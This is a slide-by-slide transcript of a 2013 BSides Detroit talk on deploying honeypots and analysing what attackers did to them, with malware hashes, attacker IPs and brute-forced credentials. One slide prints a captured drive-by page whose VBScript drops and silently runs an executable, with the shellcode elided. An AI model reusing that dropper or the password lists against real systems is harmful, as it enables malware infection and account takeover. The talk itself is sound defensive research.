Bsides detroit 2013 honeypots

1,174 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,174
On SlideShare
0
From Embeds
0
Number of Embeds
7
Actions
Shares
0
Downloads
14
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • RECALCULATE!! Somehow my Excel sorting and calculating may be off a bit.
  • Bsides detroit 2013 honeypots

    1. 1. Be vewy, vewy quiet….let’s watch some hackers..
    2. 2. Interactive portion introWhoamiWhat is a Honeypot?Different HoneypotsWhy Honeypots?Things I discoveredStratagemInteractive portion end results
    3. 3. Interactive portionSSID – FBI MobileIP address – 192.168.2.5User ID – bsidesThe password is…detroit (told you it was easy)
    4. 4. FatherHusband
    5. 5. GeekAntagonist of the shiny things
    6. 6. ShadowServer.org volunteerSecurity analystWhoami
    7. 7. A Honeypot is an informationsystem resource whose value lies inunauthorized or illicit use of thatresource. (May 2003)
    8. 8. Why Honeypots?
    9. 9. Why Honeypots?
    10. 10. Low interactionServer HoneypotsHoneyD
    11. 11. Low interactionServer HoneypotsConpot
    12. 12. Different HoneypotsClientside Honeypots
    13. 13. Windows XP SP 0 Windows Vista SP 0Client HoneypotsHigh InteractionDifferent Honeypots
    14. 14. Initial Research
    15. 15. A word of advice on using an EC2instance.
    16. 16. GeoIP locationDionaea - Ireland
    17. 17. Dionaea statsStarted  3/7/2013Stopped 3/9/2013Started  3/12/2013Stopped  3/14/2013Graphs are courtesy of DionaeaFRtool
    18. 18. Dionaea stats• Don’t forget to add your API key from VirusTotal to yourconfig file!!• If you don’t add the API key, then the pretty visualization tool can’t doit’s job and you have to do manually!!!
    19. 19. 1441097156171414998Dionaea statsTop 10 IP addresses
    20. 20. Wireshark AnalysisAttack Attempts
    21. 21. Malware CapturesMD5 Virus TotalDetectionRatioCommon name Source IP Address/WhoIs78c9042bbcefd65beaa0d40386da9f8944 / 46 Microsoft -Worm:Win32/Conficker.C• 209.190.25.37• XLHost – VPS provider• http://www.xlhost.com/7acba0d01e49618e25744d9a08e6900c45 / 46 Microsoft -Worm:Win32/Conficker.B69.28.137.10LimeLight Networks - a DigitalPresence Management companyhttp://www.limelight.com/90c081de8a30794339d96d64b86ae19442 / 43 Kaspersky -Backdoor.Win32.Rbot.aftu69.38.10.83WindStream Communications –Voice and data providerhttp://NuVox.netbcaef2729405ae54d62cb5ed097efa1243 / 44 Kaspersky -Backdoor.Win32.Rbot.bqj69.9.236.128Midwest Communications –Comcast/WideOpenWest parallelhttp://midco.net/
    22. 22. GeoIP locationDionaea - recent
    23. 23. Dionaea •Detection
    24. 24. Dionaea •Detection
    25. 25. Dionaea •Detection
    26. 26. KippoStarted  2/27/2013Stopped  3/1/2013IP addresses• 14 unique IP addresses• Maximum password attempts – 1342• Successful logins – 7• Replay scripts – 1•Files uploaded - 1
    27. 27. 1342119045416316315628 2216541 1Kippo stats2/27 to 3/1Attackers IP addresses/connection attempts
    28. 28. GeoIP locationKippo – recent
    29. 29. Kippo statsrootbinoracletestnagiosmartintoorftpuseruserpostgresinfowebmasterapachebackupguestr00tpublicgreendemositejeffandyi-heartuser0content18566717 10 9 6 6 6 5 5 5 5 4 4 4 4 4 4 4 4 4 4 4 4 3Top 25 User names2/27 – 3/1Times tried
    30. 30. Kippo stats27169 9 987 7 7 7 7 7 7 7 7 7 76 6 6Top 25 Passwords2/27 to 3/1Tries
    31. 31. Kippo statsAccounts that used 123456 aspasswordUser ID Triesroot 7ftpuser 3oracle 3andy 2info 2jeff 2site 2test 2webmaster 2areyes 1brian 1“7 successful logons? But your chart says 27 used the password of123456?! WTF?”
    32. 32. Kippo statsroot öÎÄ¥þ.òÄ¿Â¥ root !Q@W#E$root !@$#jMu2vEUIOLweoP#!TTG$@#dsgfGR#$sgs root !Q@W#E$Rroot $hack4m3baby#b1gbroth3r$ root !Q@W#E$R%root 654321 root !Q@W#E$R%Troot Ki!l|iN6#Th3Ph03$%nix@NdR3b!irD root !Q@W#E$R%T^root @!#$%&*Th3@#$!F0RcE%&*@#IS!@#$%!& root !Q@W#E$R%T^Yroot diffie-hellman-group-exchange-sha11 root !Q@W#E$R%T^Y&root 123 root !Q@W#E$R%T^Y&Uroot 1234 root !Q@W#E$R%T^Y&U*root 12345 root !Q@W#E$R%T^Y&U*Iroot 1234567 root !Q@W#E$R%T^Y&U*I(root 12345678 root !Q@W#E$R%T^Y&U*I(Oroot 123456789 root !Q@W#E$R%T^Y&U*I(O)root deathfromromaniansecurityteamneversleepba root !Q@W#E$R%T^Y&U*I(O)Proot rooooooooooooooooooooooooooooooooot root !Q@W#E$R%T^Y&U*I(O)P_Interesting passwords
    33. 33. Kippo statsFile downloadedpsyBNC 2.3.2------------This program is useful for people who cannot be on irc all the time.Its used to keep a connection to irc and your irc client connected, oralso allows to act as a normal bouncer by disconnecting from the ircserver when the client disconnects.
    34. 34. KippoStarted  5/31/2013Stopped  6/1/2013IP addresses• Unique IP addresses - 20• Maximum password attempts – 1098• Successful logins – 16• Replay scripts – 4•Files uploaded - 1
    35. 35. 670398273908864622825135 5 42211111Kippo stats5/31 to 6/1Attackers IP addresses/connection attempts
    36. 36. 221210 109 9 9 98 87 7 7 76 6 6 6 6 6 6 6 65 5Top 25 passwords5/31 to 6/1AttemptsKippo stats
    37. 37. 118417 15 11 8 8 7 6 6 5 5 4 4 4 4 4 4 4 4 4 4 4 4 4 4Top 25 user names5/31 to 6/1Login attemptsKippo stats
    38. 38. Kippo statsReplay script – 20130603-104907-9177.logJust trying to run Perl
    39. 39. Kippo statsReplay script – 20130530-134418-3935.logUpload of shellbot.pl
    40. 40. Kippo statsFile downloaded#!/usr/bin/perl## ShellBOT by: devil__Discovered: June 3, 2005Updated: April 30, 2010 3:46:09 AMType: TrojanSystems Affected:Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, WindowsNT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XPBackdoor.Shellbot is a detection name used by Symantec to identify malicioussoftware programs that share the primary functionality of enabling a remoteattacker to have access to or send commands to a compromised computer.As the name suggests, these threats are used to provide a covert channelthrough which a remote attacker can access and control a computer. TheTrojans vary in sophistication, ranging from those that only allow for limitedfunctions to be performed to those that allow almost any action to be carriedout, thus allowing the remote attacker to almost completely take over controlof a computer.Backdoor.ShellbotRisk Level 1: Very Low
    41. 41. Kippo statsReplay script – 20130602-105723-5678.logUpload a tar.gz and trips a Python reply script
    42. 42. KippoDetectionCTF replay scripts
    43. 43. Kippo• Config file changes• Custom reply filesLessons learned
    44. 44. HoneyD
    45. 45. AmunStarted  5/29Stopped  5/30IP addresses• Unique IP addresses - 3• Files uploaded - 2
    46. 46. AmunAzenv.php (uploaded twice)• ProxyJudge scriptFiles uploaded
    47. 47. Thug• Honeyclient• Mimics client behavior• Browser• Plug-ins for 3rd party apps
    48. 48. MwcrawlerPE32 files--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 445Infected files: 44Data scanned: 510.42 MBData read: 353.98 MB (ratio 1.44:1)Time: 147.925 sec (2 m 27 s)Data--- SCAN SUMMARY ---Known viruses: 2340387Engine version: 0.97.8Scanned directories: 1Scanned files: 4Infected files: 1Data scanned: 1.04 MBData read: 0.41 MB (ratio 2.57:1)Time: 7.612 sec (0 m 7 s)
    49. 49. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><htmlxmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>UntitledDocument</title> </head><body>Mwcrawler<p align="center"><h1>Were sorry,</h1><h2>The site is temporarlyunavailable. Please check in next few days</h2></p></body></html><SCRIPTLanguage=VBScript><!--DropFileName = "svchost.exe“ WriteData =<Lots of shellcode>Set FSO = CreateObject("Scripting.FileSystemObject")DropPath =FSO.GetSpecialFolder(2) & "" & DropFileNameIf FSO.FileExists(DropPath)=FalseThenSet FileObj = FSO.CreateTextFile(DropPath, True)For i = 1 To Len(WriteData)Step 2FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))NextFileObj.CloseEnd IfSetWSHshell = CreateObject("WScript.Shell")WSHshell.Run DropPath, 0//--></SCRIPT>
    50. 50. How you can your netbook useful and funagain!
    51. 51.  Project page Goals◦ Documentation Tools◦ Honeypots◦ Network◦ Malware◦ Forensics◦ ToolsStratagemhttp://sourceforge.net/projects/stratagem/
    52. 52.  Honeypots◦ Dionaea◦ Kippo◦ Glastopf◦ HoneyD◦ Amun◦ Labrea◦ Tinyhoneypot◦ Thug◦ ConpotStratagem
    53. 53.  Network◦ Scapy◦ proxychains◦ Ngrep◦ Network Miner◦ Amun◦ Xplico◦ Capanalysis◦ Network Malware◦ Mwcrawler◦ Yara◦ ClamAVStratagem Forensics◦ Volatility Tools◦ Tor◦ i2p◦ Conky◦ Guake◦ Terminator
    54. 54. StratagemCapanalysis
    55. 55. StratagemCapanalysis
    56. 56. Next?
    57. 57. Resources• A host at $IP ($location)tried to log into my honeypots fake TerminalServices server• GET-based RFI attack from $IP ($location)• A host at $IP ($location)tried to log into my honeypots fake MSSQLServerhttp://inguardians.com/
    58. 58. Resources
    59. 59. Resources
    60. 60. http://www.enisa.europa.eu/activities/cert/support/proactive-detection/proactive-detection-of-security-incidents-II-honeypots/at_download/fullReport
    61. 61. Honeydrive
    62. 62. Keith Dixon@Tazdrumm3r#misec – Tazdrumm3rtazdrummer@gmail.comhttp://tazdrumm3r.wordpress.com

    ×